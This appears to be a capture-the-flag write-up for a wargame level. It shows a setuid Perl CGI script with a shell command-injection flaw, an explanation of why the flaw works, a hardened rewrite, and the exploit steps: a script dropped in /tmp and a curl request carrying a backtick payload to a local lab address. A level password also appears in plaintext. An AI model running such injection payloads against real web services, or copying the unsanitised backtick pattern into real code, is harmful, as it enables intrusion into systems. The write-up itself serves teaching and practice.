Login
> ssh level12@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: fa6v5ateaw21peobuub8ipe6s
> ls -l level12.pl
-rwsr-sr-x+ 1 flag12 level12 464 level12.pl
> cat level12.pl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
    $nn = $_[1];
    $xx = $_[0];
    $xx =~ tr/a-z/A-Z/;
    $xx =~ s/\s.*//;
    @output = `egrep "^$xx" /tmp/xd 2>&1`;
    # backticks in Perl run the command through the shell (Bash)
    # if xx itself contains backticks, they get expanded/executed as well
    foreach $line (@output) {
        ($f, $s) = split(/:/, $line);
        if($s =~ $nn) {
            # nn is empty because arg 1 (y) is empty, so ($s =~ "") is always true
            return 1;
        }
    }
    return 0;
}
sub n {
    if($_[0] == 1) {
        print("..");
    } else {
        print(".");
    }
}
n(t(param("x"), param("y")));    # query's keys: x, y
input (x) is not sanitized before being inserted into the egrep command
- Perl interpolates/evaluates variables inside the double-quoted egrep string
- Perl runs this unsanitized command as part of the egrep backtick call
- since /tmp/GO has the x bit (777), getflag will be run
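For comparison, here is a hardened version of sub t. This is an added example, not the level's level12.pl: it assumes /tmp/xd is a colon-separated "key:value" file (as the original egrep/split logic implies), the lookup file path is passed as a parameter so the demonstration can use a constructed file, and the second argument is matched literally rather than as a client-supplied regex. No shell is involved anywhere, so backticks or other metacharacters in x have nowhere to be executed.

```perl
#!/usr/bin/env perl
# Added example (not the level's code): a hardened version of sub t.
# Assumptions: /tmp/xd holds "KEY:value" lines; the sample file below is constructed.
use strict;
use warnings;

# Hardened lookup: the file is read in Perl instead of through `egrep ...`,
# the key is whitelisted, and an empty second argument is rejected instead
# of matching everything.
sub t_safe {
    my ($x, $y, $path) = @_;
    $path //= '/tmp/xd';
    return 0 unless defined $x && defined $y && length $y;

    my $xx = uc $x;            # same effect as tr/a-z/A-Z/
    $xx =~ s/\s.*//;           # same effect as the original s/\s.*//
    # Whitelist: only a plain word prefix is accepted; backticks, $(...),
    # pipes, semicolons and globs are refused rather than handed to a shell.
    return 0 unless $xx =~ /\A[A-Z0-9_]+\z/;

    open(my $fh, '<', $path) or return 0;
    while (my $line = <$fh>) {
        chomp $line;
        next unless index($line, $xx) == 0;   # equivalent to egrep "^$xx"
        my ($f, $s) = split /:/, $line, 2;
        next unless defined $s;
        # \Q...\E quotes regex metacharacters so $y is compared literally,
        # not interpreted as a pattern chosen by the client.
        if ($s =~ /\Q$y\E/) {
            close $fh;
            return 1;
        }
    }
    close $fh;
    return 0;
}

# Demonstration with a constructed lookup file (removed afterwards).
my $tmp = "/tmp/xd_example_$$";
open(my $out, '>', $tmp) or die "cannot write $tmp: $!";
print $out "ALICE:secret1\nBOB:secret2\n";
close $out;

printf "%d\n", t_safe('alice', 'secret1', $tmp);    # 1: prefix and value match
printf "%d\n", t_safe('alice', '', $tmp);           # 0: empty y no longer matches everything
printf "%d\n", t_safe('`/*/GO`', 'secret1', $tmp);  # 0: metacharacters rejected, nothing executed
unlink $tmp;
```

The two fixes that matter are removing the shell from the data path (read the file in Perl, or at least use the list form of open/system so no shell parses the string) and refusing input that does not match the narrow shape the lookup actually needs; the empty-pattern check closes the secondary bug where `$s =~ ""` succeeds for any line.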
> echo "getflag | wall" > /tmp/GO
> chmod 777 /tmp/GO
> curl 'http://10.0.2.15:4646?x=`/*/GO`'
there you have it in tmp tmp